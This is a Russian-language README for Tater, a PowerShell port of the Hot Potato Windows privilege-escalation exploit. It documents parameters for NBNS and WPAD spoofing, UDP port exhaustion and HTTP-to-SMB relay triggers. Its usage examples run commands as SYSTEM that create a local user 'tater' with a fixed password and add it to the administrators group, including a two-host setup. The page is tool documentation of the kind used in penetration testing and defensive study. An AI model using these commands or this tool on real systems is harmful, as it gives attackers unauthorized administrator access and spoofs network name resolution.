Tater
Tater — это реализация эксплойта Hot Potato для повышения привилегий в Windows на PowerShell.
Авторство
Все авторские права принадлежат @breenmachine, @foxglovesec, Google Project Zero и всем, кто помог проработать детали этого эксплойта.
Включен в
Функции
Invoke-Tater
Параметры
- IP — Укажите конкретный локальный IP-адрес. Если этот параметр не используется, IP-адрес будет выбран автоматически.
- SpooferIP — Укажите IP-адрес для NBNS-спуфинга. Это необходимо при использовании двух хостов для обхода занятого порта 80 на целевой системе для повышения привилегий.
- Command — Команда для выполнения от имени SYSTEM на локальном хосте. При необходимости используйте escape-последовательности PowerShell.
- NBNS — По умолчанию = Включено: (Y/N) Включить/Отключить NBNS-спуфинг методом перебора.
- NBNSLimit — По умолчанию = Включено: (Y/N) Включить/Отключить ограничение NBNS-спуфера для остановки NBNS-спуфинга при корректном разрешении имени хоста.
- ExhaustUDP — По умолчанию = Отключено: (Y/N) Включить/Отключить исчерпание UDP-портов для принудительного сбоя всех DNS-запросов с целью перехода на NBNS-разрешение.
- HTTPPort — По умолчанию = 80: Укажите TCP-порт для HTTP-слушателя и ответа с перенаправлением.
- Hostname — По умолчанию = WPAD: Имя хоста для спуфинга. На Windows Server 2008 может потребоваться WPAD.DOMAIN.TLD.
- WPADDirectHosts — Список хостов через запятую, которые будут указаны как прямые в файле wpad.dat. Обратите внимание, что localhost всегда указывается как прямой.
- WPADPort — По умолчанию = 80: Укажите порт прокси-сервера, который будет включён в файл wpad.dat.
- Trigger — По умолчанию = 1: Тип триггера для запуска ретрансляции HTTP в SMB. 0 = Нет, 1 = Обновление сигнатур Защитника Windows, 2 = Webclient/Scheduled Task в Windows 10.
- TaskDelete — По умолчанию = Включено: (Y/N) Включить/Отключить удаление запланированной задачи для триггера 2. Если включено, к имени задачи будет добавлена случайная строка для предотвращения сбоев после нескольких запусков триггера 2.
- Taskname — По умолчанию = Tater: Имя запланированной задачи для триггера 2. Если вы заметили, что Tater не работает после нескольких запусков триггера 2, попробуйте изменить имя задачи.
- RunTime — По умолчанию = Неограниченно: (Целое число) Установите продолжительность выполнения в минутах.
- ConsoleOutput — По умолчанию = Отключено: (Y/N) Включить/Отключить вывод в консоль в реальном времени. При использовании этой опции через оболочку проверьте, не зависает ли оболочка.
- StatusOutput — По умолчанию = Включено: (Y/N) Включить/Отключить сообщения о запуске.
- ShowHelp — По умолчанию = Включено: (Y/N) Включить/Отключить справочные сообщения при запуске.
- Tool — По умолчанию = 0: (0,1,2) Включить/Отключить функции для лучшей работы через внешние инструменты, такие как интерактивные сеансы PowerShell в Metasploit и Empire. 0 = Нет, 1 = Metasploit, 2 = Empire
Stop-Tater
- Функция для ручной остановки Invoke-Tater.
Использование
Примеры
-
Пример базового запуска с trigger 1
Invoke-Tater -Trigger 1 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"
-
Пример базового запуска с trigger 2
Invoke-Tater -Trigger 2 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"
-
Настройка из двух систем для обхода занятого порта 80 на целевой системе для повышения привилегий
WPAD-система — 192.168.10.100 — эта система будет просто отдавать файл wpad.dat, который направит HTTP-трафик на целевой системе повышения привилегий на нестандартный HTTP-порт
Invoke-Tater -Trigger 0 -NBNS N -WPADPort 8080 -Command "null"
Цель повышения привилегий — 192.168.10.101
Invoke-Tater -Command "net user Tater Winter2016 /add && net localgroup administrators Tater /add" -HTTPPort 8080 -SpooferIP 192.168.10.100
Скриншоты
Windows 7 с использованием триггера 1 (NBNS WPAD Bruteforce + обновления сигнатур Защитника Windows)

Windows 10 с использованием триггера 2 (WebClient Service + Scheduled Task)

Windows 7 с использованием триггера 1 и исчерпанием UDP-портов
